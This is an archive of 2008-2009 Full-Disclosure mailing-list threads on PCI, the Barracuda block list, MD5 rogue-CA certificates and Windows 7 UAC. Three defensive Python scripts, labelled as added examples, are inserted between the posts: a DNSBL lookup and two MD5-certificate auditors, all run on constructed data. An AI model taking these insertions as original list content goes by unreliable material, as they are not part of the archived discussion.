>> >Hold the phone...$5k-$7k to fix an infected device!?  Really?
>> >HOLY CRAP... either that's a completely made-up "FUD" figure, or
>> >the government contractors are making *way* too much money off my
>> >taxes.
>> >
>> >__
>> >Rafal M. Los
>> >IT Security - Response | Mitigation | Strategy
>> >
>> >E-mail:  [EMAIL PROTECTED]
>> > - Blog: http://preachsecurity.blogspot.com
>> >
>> >--
>> >From: "Ivan ." <[EMAIL PROTECTED]>
>> >Sent: Monday, December 08, 2008 5:14 PM
>> >To: "Full-Disclosure mailing list" > >[EMAIL PROTECTED]>
>> >Subject: [Full-disclosure] U.S. Is Losing Global Cyberwar,
>> >Commission Says
>> >
>> >>
>> >> http://www.businessweek.com/bwdaily/dnflash/content/dec2008/db2008127_817606.htm
>> >>
>> >>
>> >
>>
>>
>>
>
>
>
>--
>http://www.goldwatches.com/
>
>http://www.jewelerslounge.com/



Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I never said we need to do something, passive awareness *can* go a
long way...

On Tue, 09 Dec 2008 13:12:25 -0500 [EMAIL PROTECTED] wrote:
>On Tue, 09 Dec 2008 12:20:36 EST, Elazar Broad said:
>> Changing the public opinion and mindset might go a long way
>> especially if it's something like "your credit card could be
>> funding the next 911", that's just a thought though.
>
>Do you *really* want to go there?
>
>We *already* have enough problems with stupid things being done in
>the name of "but there might be terrorists".




Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Neither, because ultimately no one cares, and that is why the
financial industry foots the 60 billion identity theft bill. My
rant was a little bit of wishful thinking and a shred of belief in
the human race...

On Tue, 09 Dec 2008 13:51:57 -0500 [EMAIL PROTECTED] wrote:
>On Tue, 09 Dec 2008 13:26:15 EST, Elazar Broad said:
>> I never said we need to do something, passive awareness *can* go
>> a long way...
>
>Right.  The danger is that you want to give the people a *reason*
>to care.
>
>"If you're not careful, your account could be emptied and you'll
>be very surprised at the checkout lane of the local grocery when
>you can't pay".
>
>"OMG Terrorists might get your money"
>
>Which one is a better reason, and why?




Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

The "no one" refers to your average Joe consumer, not the PCI SSC, I
am well aware that there is no easy solution, however, at the same
time, why worry about something when someone else can worry and pay
for you...

On Tue, 09 Dec 2008 14:53:29 -0500 Luke Scharf <[EMAIL PROTECTED]>
wrote:
>Elazar Broad wrote:
>> Neither, because ultimately no one cares, and that is why the
>> financial industry foots the 60 billion identity theft bill. My
>> rant was a little bit of wishful thinking and a shred of belief
>> in the human race...
>>
>
>Having been a student in a computer-security training class taught
>by one of the people who helps banks deal with these problems, I'd
>say you're wrong.  This is a hard set of problems.  Smart people are
>working on it -- not everywhere, but in enough places to make a
>difference.
>
>Read the PCI and learn its role in the financial industry.  Then
>this conversation will become interesting.  Here's a link to get you
>started:
>http://en.wikipedia.org/wiki/PCI_DSS
>
>-Luke




Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-10 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Financial IT has much competence, the problem is the red tape and
politics that many face when trying to get the job done, but then
again, you have that everywhere, I am just venting/lamenting over
it...

On Wed, 10 Dec 2008 12:23:38 -0500 Luke Scharf
<[EMAIL PROTECTED]> wrote:
>Michael Krymson wrote:
>> Like tiny Link holding the almighty Triforce braced overhead
>> glinting in the sunlight, so too shall we raise up PCI to the
>> heavens as our shining, guiding light of all things good; it will
>> save us from all evils, so shall it be...
>>
>> You should revisit this opinion after you're out of school and
>> in the workforce for 5 years. :)
>>
>
>The OP seemed to think that there was no competence in financial
>IT.  I know firsthand that there are some smart people, but, like
>everywhere else, there must be more than enough morons too --
>especially given what I've been hearing in the news, lately.
>
>But, hey, I work in academia, not the financial industry and I
>should know better than to post to FD -- so, whatever.  *shrug*
>
>-Luke
>
>




Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-10 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

"You should revisit this opinion after you're out of school and in
the workforce for 5 years. :)"

6 years and counting, a little cynicism never hurt anyone. On a
side note, I am well aware of the impact that PCI has had on the
industry (currently involved in a project which falls in the realm
of PCI compliance), those on the council as well as those in
the field pushing and advocating the standards have done some great
work, unfortunately (and it is not their fault), it's not enough...

On Wed, 10 Dec 2008 11:27:19 -0500 Michael Krymson
<[EMAIL PROTECTED]> wrote:
>Like tiny Link holding the almighty Triforce braced overhead
>glinting in the sunlight, so too shall we raise up PCI to the
>heavens as our shining, guiding light of all things good; it will
>save us from all evils, so shall it be...
>
>You should revisit this opinion after you're out of school and in
>the workforce for 5 years. :)
>
>On Tue, Dec 9, 2008 at 1:53 PM, Luke Scharf <[EMAIL PROTECTED]>
>wrote:
>
>> Elazar Broad wrote:
>> > Neither, because ultimately no one cares, and that is why the
>> > financial industry foots the 60 billion identity theft bill.
>> > My rant was a little bit of wishful thinking and a shred of
>> > belief in the human race...
>> >
>>
>> Having been a student in a computer-security training class
>> taught by one of the people who helps banks deal with these
>> problems, I'd say you're wrong.  This is a hard set of problems.
>> Smart people are working on it -- not everywhere, but in enough
>> places to make a difference.
>>
>> Read the PCI and learn its role in the financial industry.  Then
>> this conversation will become interesting.  Here's a link to get
>> you started:
>> http://en.wikipedia.org/wiki/PCI_DSS
>>
>> -Luke
>>
>>




[Full-disclosure] Barracuda Reputation Block List

2008-12-22 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Barracuda opened this up to the public back in September, see
http://www.barracudacentral.org/rbl. I have been using it for about
2 months or so, it seems to be pretty effective. Is anyone else out
there using it? What do you think?

elazar


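A reputation block list like the one above is consulted by a plain DNS query, and the way the answer is read matters as much as the list itself. The helper below is an added example (not Barracuda's code or the poster's): the zone name b.barracudacentral.org is an assumption, and the answers in CONSTRUCTED_ANSWERS are constructed so it runs offline.

```python
"""DNSBL lookup against a reputation block list such as the Barracuda RBL.

Added example, not Barracuda's code or the poster's. The zone name is an
assumption (the post only links barracudacentral.org/rbl); the answers in
CONSTRUCTED_ANSWERS are constructed so the example runs offline.
"""
import ipaddress
import socket

BARRACUDA_RBL_ZONE = "b.barracudacentral.org"  # assumed zone name

# RFC 5782 test points: a DNSBL must list 127.0.0.2 and must not list
# 127.0.0.1, which lets a resolver be sanity-checked before real use.
TEST_LISTED = "127.0.0.2"
TEST_NOT_LISTED = "127.0.0.1"
LISTING_RANGE = ipaddress.ip_network("127.0.0.0/8")


def dnsbl_query_name(ip, zone=BARRACUDA_RBL_ZONE):
    """Reverse the IPv4 octets and append the zone: 1.2.3.4 -> 4.3.2.1.<zone>."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("this helper handles IPv4 listings only")
    return ".".join(reversed(str(addr).split("."))) + "." + zone


def interpret_answer(answers):
    """Classify the A records returned for a query name.

    No answer (NXDOMAIN) means not listed. A listing is signalled by
    addresses inside 127.0.0.0/8; anything else is almost always a resolver
    that rewrites NXDOMAIN (ISP "search assist"), and must not be treated as
    a listing or every sender would be rejected.
    """
    if not answers:
        return ("not_listed", [])
    for a in answers:
        if ipaddress.ip_address(a) not in LISTING_RANGE:
            return ("invalid", list(answers))
    return ("listed", list(answers))


def system_resolver(name):
    """A records for name via the system resolver; [] when it does not exist."""
    try:
        infos = socket.getaddrinfo(name, None, socket.AF_INET)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def check_sender(ip, resolver=system_resolver, zone=BARRACUDA_RBL_ZONE):
    """Look up one sending IP; returns (verdict, answer_codes)."""
    return interpret_answer(resolver(dnsbl_query_name(ip, zone)))


def rbl_self_test(resolver=system_resolver, zone=BARRACUDA_RBL_ZONE):
    """True only if the zone answers both RFC 5782 test points as expected."""
    return (check_sender(TEST_LISTED, resolver, zone)[0] == "listed"
            and check_sender(TEST_NOT_LISTED, resolver, zone)[0] == "not_listed")


# Constructed DNS answers standing in for a live server (not real listings).
CONSTRUCTED_ANSWERS = {
    "2.0.0.127.b.barracudacentral.org": ["127.0.0.2"],    # RFC 5782 test point
    "4.3.2.1.b.barracudacentral.org": ["127.0.0.2"],      # a listed sender
    "1.1.0.10.b.barracudacentral.org": ["198.51.100.7"],  # NXDOMAIN-rewriting resolver
}


def fake_resolver(name):
    return CONSTRUCTED_ANSWERS.get(name, [])


if __name__ == "__main__":
    print("zone self-test:", rbl_self_test(fake_resolver))
    for sender in ("1.2.3.4", "203.0.113.5", "10.0.1.1"):
        print(sender, check_sender(sender, fake_resolver))
```

Run rbl_self_test against the real resolver before wiring the verdict into a mail filter; a resolver that fails it will either reject everything or nothing.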


Re: [Full-disclosure] This list has run its course

2008-12-22 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

April Fools isn't for another 4 months...

On Mon, 22 Dec 2008 17:53:29 -0500 n3td3v 
wrote:
>Real researchers who should be taken seriously aren't taken
>seriously anymore.
>
>I'm leaving full-disclosure because of the abuse.
>
>It's just turned into flames to spin people up, I don't get a
>chance to talk about security or my skill set.
>
>It's abuse after abuse after abuse.
>
>Sorry, I can't take it anymore.
>
>Got to go, bye.
>




[Full-disclosure] Creating a rogue CA certificate

2008-12-30 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SSL/PKI is only as strong as the weakest CA...

For those of you who haven't been following this, here you go:

http://www.win.tue.nl/hashclash/rogue-ca/
http://www.phreedom.org/research/rogue-ca/md5-collisions-1.0.ppt

Enjoy and Happy New Years!

elazar


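The weakest-CA point above comes down to one field: which hash the CA signed over. The check below, an added example that is not code from the post or from the linked research, walks a DER chain and flags any certificate (an intermediate especially) whose signatureAlgorithm is MD5 or MD2; the sample chain is constructed and assumes only the standard X.509 outer layout.

```python
"""Flag MD5/MD2-signed certificates anywhere in a chain.

Added example for the rogue-CA links above, not code from the post or the
linked research. It reads only the outer X.509 structure (tbsCertificate,
signatureAlgorithm, signatureValue), which is enough to get the OID.
"""
import re
import ssl

SIG_ALG_NAMES = {
    "1.2.840.113549.1.1.2": "md2WithRSAEncryption",
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
}
# Algorithms the collision work targets: a certificate issued under them no
# longer proves the CA vouched for the key and subject it carries.
COLLISION_PRONE = {"1.2.840.113549.1.1.2", "1.2.840.113549.1.1.4"}

def _read_tlv(buf, pos):
    """Read one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                          # long form: low bits = length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("truncated DER element")
    return tag, buf[pos:pos + length], pos + length

def _decode_oid(content):
    """OID content bytes to dotted form; the first byte packs the first two arcs."""
    arcs, value = [content[0] // 40, content[0] % 40], 0
    for b in content[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:                       # high bit clear closes the arc
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))

def signature_algorithm_oid(cert_der):
    """Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signature }."""
    tag, cert, _ = _read_tlv(cert_der, 0)
    if tag != 0x30:
        raise ValueError("certificate is not a DER SEQUENCE")
    _, _, pos = _read_tlv(cert, 0)             # skip tbsCertificate
    tag, alg_id, _ = _read_tlv(cert, pos)      # AlgorithmIdentifier SEQUENCE
    if tag != 0x30:
        raise ValueError("malformed signatureAlgorithm")
    oid_tag, oid, _ = _read_tlv(alg_id, 0)
    if oid_tag != 0x06:
        raise ValueError("signatureAlgorithm does not start with an OID")
    return _decode_oid(oid)

def audit_chain(chain_der):
    """(index, oid, name, collision_prone) per certificate, leaf first. A
    self-signed root's own signature is not a trust decision; intermediates are."""
    report = []
    for i, der in enumerate(chain_der):
        oid = signature_algorithm_oid(der)
        report.append((i, oid, SIG_ALG_NAMES.get(oid, "unknown"), oid in COLLISION_PRONE))
    return report

def audit_pem_chain(pem_text):
    """Same check on PEM text, e.g. the output of `openssl s_client -showcerts`."""
    pems = re.findall(r"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----", pem_text, re.S)
    return audit_chain([ssl.PEM_cert_to_DER_cert(p) for p in pems])

# Constructed sample chain: stub certificates with real DER framing, not valid X.509.
def _der(tag, content):
    if len(content) < 0x80:
        return bytes([tag, len(content)]) + content
    lb = len(content).to_bytes((len(content).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content

def _der_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:                               # base-128, high bit on all but last
            chunk.insert(0, 0x80 | (a & 0x7F))
            a >>= 7
        out.extend(chunk)
    return _der(0x06, bytes(out))

def constructed_cert(sig_oid):
    tbs = _der(0x30, _der(0x02, b"\x01"))                   # stub tbs: serial only
    alg = _der(0x30, _der_oid(sig_oid) + _der(0x05, b""))   # OID + NULL parameters
    return _der(0x30, tbs + alg + _der(0x03, b"\x00" * 9))  # dummy BIT STRING

SAMPLE_CHAIN = [constructed_cert("1.2.840.113549.1.1.11"),  # leaf, SHA-256
                constructed_cert("1.2.840.113549.1.1.4"),   # intermediate, MD5
                constructed_cert("1.2.840.113549.1.1.5")]   # root, SHA-1

def sample_pem_chain():
    """PEM form of SAMPLE_CHAIN, to exercise audit_pem_chain offline."""
    return "".join(ssl.DER_cert_to_PEM_cert(c) for c in SAMPLE_CHAIN)
```

On a real chain the intermediate is the entry to watch: a collision-prone signature there means every leaf under it inherits the problem, whatever the leaf itself was signed with.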


Re: [Full-disclosure] Creating a rogue CA certificate

2008-12-30 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I am waiting for RapidSSL's reaction, then again, $12 certs, you
get what you pay for...

On Tue, 30 Dec 2008 14:02:11 -0500 James Matthews
 wrote:
>This is going to be fun for all e-commerce sites etc
>
>On Tue, Dec 30, 2008 at 7:03 PM, Elazar Broad
> wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> SSL/PKI is only as strong as the weakest CA...
>>
>> For those of you who haven't been following this, here you go:
>>
>> http://www.win.tue.nl/hashclash/rogue-ca/
>> http://www.phreedom.org/research/rogue-ca/md5-collisions-1.0.ppt
>>
>> Enjoy and Happy New Years!
>>
>> elazar
>>
>> --
>> Click for free info on getting an MBA, $200K/ year potential.
>>
>>
>http://tagline.hushmail.com/fc/PnY6qxsZwUN6299xt0fJO8HvJUKovV4hcZ7M
>H3I6KbhlC0IDsYiG8/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
>--
>http://www.astorandblack.com/


Re: [Full-disclosure] Creating a rogue CA certificate

2008-12-30 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

And they should have listened then; it was only a matter of time
before someone fleshed out a practical attack, and that time is
now. Then again, I am sure there are some ATMs out there still using
DES. How many times do we need to prove Moore's law...

On Tue, 30 Dec 2008 15:26:46 -0500 Nelson Murilo
 wrote:
>Implementation could be new, but this vulnerability has been known
>since 2004,
>the year that MD5 was broken.
>
>http://www.cryptography.com/cnews/hash.html
>
>./nelson -murilo
>
>
>On Tue, Dec 30, 2008 at 08:10:16PM +, n3td3v wrote:
>> Aiding script kids to get credit card numbers out of folks e-
>commerce
>> purchases. I'm sure the U.S secret service have a special
>interest in
>> this vulnerability, as so much of their time nowadays is taken
>up
>> following up on internet carders and shutting them down.
>>
>> On Tue, Dec 30, 2008 at 5:03 PM, Elazar Broad
> wrote:
>> > -BEGIN PGP SIGNED MESSAGE-
>> > Hash: SHA1
>> >
>> > SSL/PKI is only as strong as the weakest CA...
>> >
>> > For those of you who haven't been following this, here you go:
>> >
>> > http://www.win.tue.nl/hashclash/rogue-ca/
>> > http://www.phreedom.org/research/rogue-ca/md5-collisions-
>1.0.ppt
>


Re: [Full-disclosure] Creating a rogue CA certificate

2008-12-31 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

That's true, keeping up with security is neither cheap nor easy.
Tradeoffs are tradeoffs; the question is, when it comes down to
the $$$, is more cost effective to be proactive vs reactive in this
case. Time will tell...

On Tue, 30 Dec 2008 16:42:47 -0500 valdis.kletni...@vt.edu wrote:
>On Tue, 30 Dec 2008 16:13:07 EST, Elazar Broad said:
>> And they should have listened then, it was only a matter of time
>> before someone fleshed out a practical attack, and that time is
>> now. Then again, I am sure there some ATM's out there still
>using
>> DES. How many time's do we need to prove Moore's law...
>
>Playing devil's advocate for a moment...
>
>And perhaps they *were* listening, but realized that security is
>about
>tradeoffs, and they balanced the cost of doing the upgrade back
>then
>against the chances that a team as technically and budget-wise
>prepared
>as this one, *and with nefarious intent*, would do something
>significantly
>drastic enough to dent their revenue stream.
>
>Read section 5.2 of the hashclash/rogue-ca paper.  The victim CA
>is churning
>out an average of 1,000 certs in 3 days, let's say at $12 per.
>That's some
>$600K per year for just the weekends, not counting the Mon-Thurs
>span which
>is probably even higher (and why they targeted a weekend).  So $2M
>per year
>or more.
>
>Who wants to place a bet that said CA will be selling *the same
>number*
>of certs every week, meaning they had *no* economic loss due to
>this hack,
>because their customers won't actually *see* the news article and
>give them
>a bad feeling about their CA?  And with no actual loss, why spend
>the money
>to implement the change?
>
>Hint: It *isn't* just a matter of changing one line in a script to
>say
>'sha1' instead of 'md5' - you *also* need to go back and look at
>all the
>certs you've issued already and figure out if they've been
>tweaked...

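Valdis's hint above (it isn't just swapping 'md5' for 'sha1' in a script, you also have to go back over everything already issued) and the "weakest CA" point at the top of the thread both come down to one mechanical check: read the signature algorithm out of each certificate and flag the MD5 ones. The following is an added example, not code from the thread, the hashclash paper or any CA's tooling. It walks the DER of an X.509 certificate with a minimal reader (no external libraries) and reports both the algorithm in tbsCertificate.signature and the outer signatureAlgorithm, since the two are supposed to match. The two certificates it audits are constructed stand-ins built by the same script, with empty names and a zero signature value; only the algorithm OIDs (md5WithRSAEncryption 1.2.840.113549.1.1.4, sha256WithRSAEncryption 1.2.840.113549.1.1.11, rsaEncryption 1.2.840.113549.1.1.1) are the real ones. To audit a real issued certificate you would feed its DER bytes to audit_cert() instead of calling build_cert().

```python
# Added example (not from the thread or the hashclash paper): a minimal DER
# reader that extracts an X.509 certificate's signature algorithm and flags
# MD5-based signatures.  The sample certificates are constructed placeholders.

WEAK_SIGNATURE_OIDS = {
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.2": "md2WithRSAEncryption",
}
SHA256_RSA_OID = "1.2.840.113549.1.1.11"
RSA_OID = "1.2.840.113549.1.1.1"


# --- tiny DER encoder, used only to build the constructed sample certs ---
def _der_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, body):
    return bytes([tag]) + _der_len(len(body)) + body


def encode_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))


def build_cert(sig_oid):
    """Constructed certificate skeleton: empty issuer/subject, dummy signature."""
    alg = tlv(0x30, encode_oid(sig_oid) + tlv(0x05, b""))          # AlgorithmIdentifier
    validity = tlv(0x30, tlv(0x17, b"081230000000Z") + tlv(0x17, b"091230000000Z"))
    spki = tlv(0x30, tlv(0x30, encode_oid(RSA_OID) + tlv(0x05, b"")) + tlv(0x03, b"\x00"))
    tbs = tlv(0x30,
              tlv(0xA0, tlv(0x02, b"\x02")) +                      # [0] version v3
              tlv(0x02, b"\x01") +                                 # serialNumber
              alg +                                                # signature
              tlv(0x30, b"") + validity + tlv(0x30, b"") + spki)   # issuer, validity, subject, key
    return tlv(0x30, tbs + alg + tlv(0x03, b"\x00" * 9))           # signatureValue: placeholder


# --- DER reader ---
def read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def children(body):
    pos, out = 0, []
    while pos < len(body):
        tag, val, pos = read_tlv(body, pos)
        out.append((tag, val))
    return out


def decode_oid(body):
    arcs, cur = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        cur = (cur << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(cur)
            cur = 0
    return ".".join(map(str, arcs))


def signature_algorithms(cert_der):
    """Return (tbsCertificate.signature OID, outer signatureAlgorithm OID)."""
    _, cert, _ = read_tlv(cert_der, 0)
    tbs, outer_alg, _sig = children(cert)
    fields = children(tbs[1])
    idx = 2 if fields[0][0] == 0xA0 else 1          # skip the optional [0] version
    inner_oid = decode_oid(children(fields[idx][1])[0][1])
    outer_oid = decode_oid(children(outer_alg[1])[0][1])
    return inner_oid, outer_oid


def audit_cert(cert_der):
    """Findings for one certificate: weak hash, or inner/outer algorithm mismatch."""
    inner, outer = signature_algorithms(cert_der)
    findings = []
    if inner != outer:
        findings.append("algorithm mismatch: tbs=%s outer=%s" % (inner, outer))
    for oid in sorted({inner, outer}):
        if oid in WEAK_SIGNATURE_OIDS:
            findings.append("weak signature algorithm: " + WEAK_SIGNATURE_OIDS[oid])
    return findings


if __name__ == "__main__":
    for label, oid in (("md5 cert", "1.2.840.113549.1.1.4"), ("sha256 cert", SHA256_RSA_OID)):
        print(label, audit_cert(build_cert(oid)) or ["ok"])
```

The reader only understands what this check needs (SEQUENCE, OID, the tagged version field); a full-blown audit would also want to look at the issuer, serial and validity of anything flagged, since a colliding certificate is only dangerous if a trusted path still chains through it.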

Re: [Full-disclosure] Creating a rogue CA certificate

2008-12-31 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


> is more cost effective

should have been is *it

On Wed, 31 Dec 2008 12:57:52 -0500 Elazar Broad
 wrote:
>That's true, keeping up with security is not cheap nor easy.
>Tradeoff's are tradeoff's, the question is, when it comes down to
>the $$$, is more cost effective to be proactive vs reactive in
>this
>case. Time will tell...
>
>On Tue, 30 Dec 2008 16:42:47 -0500 valdis.kletni...@vt.edu wrote:
>>On Tue, 30 Dec 2008 16:13:07 EST, Elazar Broad said:
>>> And they should have listened then, it was only a matter of
>time
>>> before someone fleshed out a practical attack, and that time is
>>> now. Then again, I am sure there some ATM's out there still
>>using
>>> DES. How many time's do we need to prove Moore's law...
>>
>>Playing devil's advocate for a moment...
>>
>>And perhaps they *were* listening, but realized that security is
>>about
>>tradeoffs, and they balanced the cost of doing the upgrade back
>>then
>>against the chances that a team as technically and budget-wise
>>prepared
>>as this one, *and with nefarious intent*, would do something
>>significantly
>>drastic enough to dent their revenue stream.
>>
>>Read section 5.2 of the hashclash/rogue-ca paper.  The victim CA
>>is churning
>>out an average of 1,000 certs in 3 days, let's say at $12 per.
>>That's some
>>$600K per year for just the weekends, not counting the Mon-Thurs
>>span which
>>is probably even higher (and why they targeted a weekend).  So
>$2M
>>per year
>>or more.
>>
>>Who wants to place a bet that said CA will be selling *the same
>>number*
>>of certs every week, meaning they had *no* economic loss due to
>>this hack,
>>because their customers won't actually *see* the news article and
>>give them
>>a bad feeling about their CA?  And with no actual loss, why spend
>>the money
>>to implement the change?
>>
>>Hint: It *isn't* just a matter of changing one line in a script
>to
>>say
>>'sha1' instead of 'md5' - you *also* need to go back and look at
>>all the
>>certs you've issued already and figure out if they've been
>>tweaked...


Re: [Full-disclosure] e-Holocaust

2009-01-23 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

And you can probably find a majority of those 72 listed here
http://www.nsopw.gov...



On Fri, 23 Jan 2009 10:24:12 -0500 Miller Grey
 wrote:
>...hehe...
>
>On Mon, Jan 12, 2009 at 7:50 PM,  wrote:
>
>> On Mon, 12 Jan 2009 09:41:19 PST, Rants nRaves said:
>>
>> > Thank you for explaining it to me- it's so much clearer now.
>Based on
>> this
>> > new information, I take it your local religious leader told
>you hacking
>> some
>> > pointless websites and looking like an idiot in front of
>thousands of
>> people
>> > on full-disclosure wasn't worth even a single virgin in heaven
>then?
>>
>> Actually, they get 'friended' by 72 Myspace virgins, none of
>which look
>> anything like their picture.
>>


Re: [Full-disclosure] Windows 7 UAC compromised

2009-02-06 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Exactly, so we only make him click for non-system
applets/utilities, and we determine that by digital signatures,
which is exactly how UAC is implemented in Windows 7. With that
said, now we are back to the original issue: a computer is only as
smart (or dumb, my apologies to the AI crowd) as the guy who
programmed it, or in other words, how hard (or easy) is it to spoof
a system applet/utility?

Human nature dictates (most of the time) that we become
desensitized to things that are routine or occur often; in other
words, the more UAC prompts, the more blind clicking. Then again,
did Joe Sixpack bother to read the first UAC prompt when he started
up his shiny new Vista for the 1st time?

Now, if we wired UAC up to a mouse with an electrode embedded in
the left mouse button, we might have a solution. Of course the
voltage would need to increase slightly over the life of the mouse
in order to solve the blind shock and click problem...

elazar

On Fri, 06 Feb 2009 05:57:03 -0500 Yudi Rosen
 wrote:
>But Joe the Plumber doesn't want to have to click on endless
>'confirm'
>dialogs every time he tries to use the computer. Simply having him
>run as a
>non-admin user only fixes half the problem.
>
>On Thu, Feb 5, 2009 at 9:17 PM, Jimmy Astle 
>wrote:
>
>> I am new to the list so hello to everyone.
>>
>> Now for the Windows 7 UAC stuff.
>>
>> 1.) Its beta its not going to be perfect wait for RC1 before
>selling 7
>> down the river.
>> 2.)
>> http://www.informationweek.com/news/security/app-
>security/showArticle.jhtml?articleID=213001021&subSection=News
>>
>>It all comes back to windows biggest issue, joe
>the plumber
>> shouldn't not be running as a local admin on his box. UAC
>problem solved!  I
>> still dont see how redmond missed the concept.
>>
>>
>>
>>
>> On Thu, Feb 5, 2009 at 1:52 PM, Miller Grey
>wrote:
>>
>>> ...what?
>>>
>>> On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr.
> wrote:
>>>
 Windows says: Hello world! Check this out, world, this is
>really cool.
 Now I have, uh, something like, uh, "privileges management"!



 "UAC" is no more than a new commercial designation for
>something with
 about 40 years.
 And they (Redmond) are still missing the concept's point.






 On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard
  wrote:
 >> The biggest issue here is that although it's technically
>easy to fix
 >> this problem (just have UAC issue an alert when somebody's
>messing
 with
 >> the system settings), it involves doing more of what end
>users dislike
 >> most about UAC (it issuing alerts to Joe Sixpack all the
>time when he
 >> does something bone-headed security-wise).
 >>
 >> Fixing this one in a way that users will put up with will
>be a bitch.
 >
 > Why not just have it not prompt if you are changing
>settings, except
 for UAC settings? that would be the simple way around it
 >



 --
 Marcio Barbado, Jr.



Re: [Full-disclosure] Windows 7 UAC compromised

2009-02-06 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


> I maintain that by not educating our users we are failing in that
> goal.

With many it is in one ear, out the other, unless you are allowed
to use a clue bat...

On Fri, 06 Feb 2009 09:36:32 -0500 Kevin Wilcox
 wrote:
>2009/2/6 Yudi Rosen :
>
>> But Joe the Plumber doesn't want to have to click on endless
>'confirm'
>> dialogs every time he tries to use the computer. Simply having
>him run as a
>> non-admin user only fixes half the problem.
>
>No, it doesn't fix anywhere *near* half of the problem; it doesn't
>address that we have millions of people that use their computers
>without knowing anything about them.
>
>"But not every car driver needs to be a mechanic!" Yes, I know
>this,
>but every driver needs to know that there are laws and rules
>concerning how they drive and what happens when a 1200 kilogramme
>car
>hits a 100 kilogramme pedestrian at 70 kilometres/hour. Every
>driver
>needs to know they need to have their tyres rotated and their oil
>changed. There are things you must know beyond, "accelerator,
>decelerator and steering wheel".
>
>"But a computer isn't going to kill anyone if someone gets
>infected by
>a virus or trojan!" Yes, I know this, too, but if you're mixing
>questionable software and surfing habits with online banking and
>shopping, it's a recipe for destruction. Welcome to identity theft
>and
>empty bank accounts.
>
>We can either continue to pretend like it's *only* really crappy
>software or we can realise that it's a combination of easily
>exploitable software, user ignorance and user apathy. You can give
>them an operating system that has been vetted and been through
>multiple code reviews by people that really do know secure OS
>design
>but they wouldn't be able to accomplish anything at all. So what
>do we
>do? We give them operating systems that are less secure, hope they
>don't shoot their feet off and turn them loose with it - but we
>don't
>shoulder the burden of training them. Some of us do but we, as a
>collective, do not. Until we can properly educate our users, all
>we
>are doing is trying to mitigate risk in the best ways we can while
>still providing them a service. I maintain that by not educating
>our
>users we are failing in that goal.
>
>kmw
>
>--
>Far better is it to dare mighty things, to win glorious triumphs,
>even
>if chequered by failure, than to take rank with those poor spirits
>who
>neither enjoy much nor suffer much, because they live in the grey
>twilight that knows not victory or defeat.
>


Re: [Full-disclosure] Oh Yeah, botnet communications

2009-02-19 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

"You know how the current amateur botnet offerings are basing
domain lists off the current time to allow the 'good guys' to
prepare?"

Shhh, you're gonna wake the " writes all the
malware" theorists...


